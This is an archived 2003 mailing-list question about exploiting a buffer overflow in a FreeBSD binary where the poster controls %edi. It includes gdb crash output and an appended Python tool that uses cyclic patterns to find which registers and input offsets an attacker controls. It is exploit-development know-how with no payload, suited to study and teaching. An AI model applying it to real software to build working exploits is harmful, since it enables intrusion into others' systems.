Subject: exploiting a binary if %edi can be overwritten?
From: avel (gmx.ch)
Date: Mon Jun 23 2003 - 03:06:05 CDT
Hi community,
I have a buffer overflow question. If I have a binary (no src available)
that I can crash with a too long string, so that %edi is set to 0x41414141
(meaning I could control it)... can I craft the buffer so that the address in
%edi is actually jumped to?
If I put in a malformed addr (like above) the proc segfaults; if I put in a
valid one (like the addr of my shellcode) it gets executed normally (that's why I
think I have to restore/push/pop %edi to another register somehow... but
how?)
In theory I'd like to do something like restoring the addr I have written to
the place where %edi is to some other register, which would jmp to the
addr given by me. I just don't know _where_ to write _what_ to accomplish that.
Maybe push %edi and ret in opcodes (but where? In front of my shellcode
won't make much sense, since the prog won't jmp there...)?
...is this exploitable at all?
# ./mybinary `perl -e 'print "A" x 5000'`
Segmentation fault (core dumped)
# gdb -core mybinary.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `mybinary'.
Program terminated with signal 11, Segmentation fault.
#0 0x2813ecfa in ?? ()
(gdb) bt
#0 0x2813ecfa in ?? ()
#1 0x2813dae9 in ?? ()
#2 0x2813de32 in ?? ()
#3 0x2813da25 in ?? ()
#4 0x8049123 in ?? ()
#5 0x8049831 in ?? ()
#6 0x804cd19 in ?? ()
#7 0x804906a in ?? ()
(gdb) i reg
eax 0x0 0
ecx 0xffffffff -1
edx 0x2813ec4c 672394316
ebx 0x2815000c 672464908
esp 0xbfbfdd48 0xbfbfdd48
ebp 0xbfbfdfa0 0xbfbfdfa0
esi 0x8 8
edi 0x41414141 1094795585
eip 0x2813ecfa 0x2813ecfa
eflags 0x3286 12934
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) x/10i $pc
0x2813ecfa: Cannot access memory at address 0x2813ecfa.
(gdb) x/10i $eax
0x0: Cannot access memory at address 0x0.
(gdb) x/10i $ecx
0xffffffff: Cannot access memory at address 0xffffffff.
(gdb) x/10i $ebx
0x2815000c: push %esp
0x2815000d: das
0x2815000e: or %al,(%eax)
0x28150010: add %al,0x34502806(%ebx)
0x28150016: add $0xdcfba28,%eax
0x2815001b: sub %cl,%dl
0x2815001d: iret
0x2815001e: or $0xdcfda28,%eax
0x28150023: sub %ch,%dl
0x28150025: iret
(gdb) x/10i $esp
0xbfbfdd48: or $0x0,%al
0xbfbfdd4a: adc $0x14fe9028,%eax
0xbfbfdd4f: sub %bl,%al
0xbfbfdd51: jecxz 0xbfbfdd12
0xbfbfdd53: mov $0x20202020,%edi
0xbfbfdd58: and %ah,(%eax)
0xbfbfdd5a: and %ah,(%eax)
0xbfbfdd5c: mov %ds,%edi
0xbfbfdd5e: mov $0xbfe6e0bf,%edi
0xbfbfdd63: mov $0x2,%edi
(gdb) x/10i $ebp
0xbfbfdfa0: xor %ah,%ah
0xbfbfdfa2: mov $0x13dae9bf,%edi
0xbfbfdfa7: sub %bl,%al
0xbfbfdfa9: jecxz 0xbfbfdf6a
0xbfbfdfab: mov $0x804f6c0,%edi
0xbfbfdfb0: in $0xe6,%al
0xbfbfdfb2: mov $0x13da89bf,%edi
0xbfbfdfb7: sub %cl,(%eax,%eax,1)
0xbfbfdfba: adc $0xbfe84028,%eax
0xbfbfdfbf: mov $0xbfbfe84c,%edi
(gdb) x/10i $esi
0x8: Cannot access memory at address 0x8.
(gdb) x/10i $edi
0x41414141: Cannot access memory at address 0x41414141.
(gdb) x/10i $eip
0x2813ecfa: Cannot access memory at address 0x2813ecfa.
(gdb)
Thanks for any help with that topic!
avel
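The first thing a practitioner does with a crash like the one above is work out which registers actually came from the input and at what offset, before thinking about how to redirect execution. The following is an added example, not code from the poster: it generates a Metasploit-style cyclic pattern to use in place of "A" x 5000, parses the output of gdb's "info registers", and for each register reports whether it holds the fill byte (came from the input, offset unknown), a slice of the cyclic pattern (offset recovered), or something unrelated to the input. The first register dump is copied from the post; the second dump, with %edi = 0x68423368, is constructed to show what the same crash would look like after a cyclic-pattern run, and the offset 1000 it yields is an assumption of that constructed input, not a fact about the poster's binary.

```python
import itertools
import re
import string
import struct
from typing import Dict, List, Optional, Tuple

# Register dump copied from the crash in the post: every byte of %edi is 0x41 ('A'),
# while eip holds a shared-library address that did not come from the input.
GDB_INFO_REG_FROM_POST = """\
eax 0x0 0
ecx 0xffffffff -1
edx 0x2813ec4c 672394316
ebx 0x2815000c 672464908
esp 0xbfbfdd48 0xbfbfdd48
ebp 0xbfbfdfa0 0xbfbfdfa0
esi 0x8 8
edi 0x41414141 1094795585
eip 0x2813ecfa 0x2813ecfa
"""

# Constructed dump (not from the post): the same crash if the 5000-byte argument
# had been a cyclic pattern instead of "A" x 5000.  0x68423368 is "h3Bh" in memory.
GDB_INFO_REG_CYCLIC = """\
edi 0x68423368 1749169000
eip 0x2813ecfa 0x2813ecfa
"""

PATTERN_MAX = 26 * 26 * 10 * 3  # 20280 bytes; beyond that the pattern repeats


def cyclic_pattern(length: int) -> bytes:
    """Aa0Aa1Aa2...: triplets of uppercase, lowercase, digit (digit changes fastest).
    Within PATTERN_MAX bytes every 4-byte window occurs exactly once."""
    if not 0 <= length <= PATTERN_MAX:
        raise ValueError("pattern longer than %d bytes is not unique" % PATTERN_MAX)
    trip = itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    text = "".join("".join(t) for t in itertools.islice(trip, (length + 2) // 3))
    return text[:length].encode("ascii")


def cyclic_offset(value: int, length: int = PATTERN_MAX) -> Optional[int]:
    """Offset in the pattern of the 4 bytes that landed in a 32-bit register.
    x86 is little-endian, so the register's low byte is the first byte in memory."""
    needle = struct.pack("<I", value & 0xFFFFFFFF)
    pos = cyclic_pattern(length).find(needle)
    return None if pos < 0 else pos


_REG_LINE = re.compile(r"^\s*(\w+)\s+(0x[0-9a-fA-F]+)")


def parse_gdb_regs(text: str) -> Dict[str, int]:
    """Parse gdb 'info registers' output: name, hex value, decimal/raw column."""
    regs: Dict[str, int] = {}
    for line in text.splitlines():
        m = _REG_LINE.match(line)
        if m:
            regs[m.group(1)] = int(m.group(2), 16)
    return regs


def triage(regs: Dict[str, int], fill: int = 0x41) -> Dict[str, Tuple[str, Optional[int]]]:
    """Classify each register as ('fill', None): all four bytes are the fill byte,
    so the input reached it but the offset is unknown; ('pattern', offset): the
    value is a slice of the cyclic pattern; or ('other', None): not from the input."""
    fill_dword = int.from_bytes(bytes([fill]) * 4, "little")
    verdicts: Dict[str, Tuple[str, Optional[int]]] = {}
    for name, val in regs.items():
        if val == fill_dword:
            verdicts[name] = ("fill", None)
            continue
        off = cyclic_offset(val)
        verdicts[name] = ("pattern", off) if off is not None else ("other", None)
    return verdicts


def controlled_registers(text: str) -> List[str]:
    """Names of the registers whose value came from the input, in dump order."""
    return [n for n, (kind, _) in triage(parse_gdb_regs(text)).items() if kind != "other"]


if __name__ == "__main__":
    for label, dump in (("post", GDB_INFO_REG_FROM_POST), ("cyclic", GDB_INFO_REG_CYCLIC)):
        print(label, triage(parse_gdb_regs(dump)))
    print("controlled in the post's dump:", controlled_registers(GDB_INFO_REG_FROM_POST))
```

On the post's dump the only register flagged is %edi; eip is not derived from the input, which is consistent with the poster's observation that a valid address in that slot lets the program run normally: the overwritten value is being restored into a callee-saved register and used as a pointer by whatever library routine faulted at 0x2813ecfa, not loaded into eip. The recovered offset from a cyclic-pattern run is what tells you which four bytes of the 5000-byte argument to change, and the same triage should be repeated on the rest of the stack (saved ebp and the return address) to see whether anything the input reached is ever used as a jump target.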